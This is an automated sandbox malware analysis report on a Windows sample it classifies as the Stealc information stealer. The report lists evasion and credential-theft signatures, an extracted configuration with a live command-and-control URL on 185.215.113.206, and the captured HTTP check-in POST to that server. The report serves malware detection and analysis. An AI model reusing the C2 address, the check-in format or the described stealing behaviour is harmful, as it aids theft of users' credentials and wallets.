Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562673
MD5:6487be67797f2ab4bcd902c3b34efe97
SHA1:6b4a7190c65c8c54c39e66fabab190afd36cb5fb
SHA256:bab41e3e4289d1b7d5785304cc05ba4acbb42b51d5d18053305b6bd19a77474a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3800 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6487BE67797F2AB4BCD902C3B34EFE97)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3800JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3800JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-25T21:27:12.585325+010020442431Malware Command and Control Activity Detected192.168.2.649717185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.3800.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 42%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_006C4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_006C60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006E40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_006D6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_006CEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_006D6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_006C9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_006C9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_006C7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006D18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006DE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006DCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006CDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006CDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_006D2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_006DDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006C16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006C16B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49717 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 39 43 33 42 36 37 41 44 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="hwid"CF9C3B67AD1C389561124------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build"mars------HDAFIIDAKJDGDHIDAKJJ--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_006C6C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 39 43 33 42 36 37 41 44 31 43 33 38 39 35 36 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="hwid"CF9C3B67AD1C389561124------HDAFIIDAKJDGDHIDAKJJContent-Disposition: form-data; name="build"mars------HDAFIIDAKJDGDHIDAKJJ--
              Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2222214050.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
              Source: file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpE
              Source: file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
              Source: file.exe, 00000000.00000002.2222214050.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpz
              Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206d
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_006C9770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E48B00_2_006E48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7F1D20_2_00A7F1D2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7A1D80_2_00A7A1D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A71ADF0_2_00A71ADF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7BBF60_2_00A7BBF6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A80BC80_2_00A80BC8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B9CF60_2_009B9CF6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6E46D0_2_00A6E46D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE4D340_2_00AE4D34
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A735520_2_00A73552
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A74EFF0_2_00A74EFF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A786330_2_00A78633
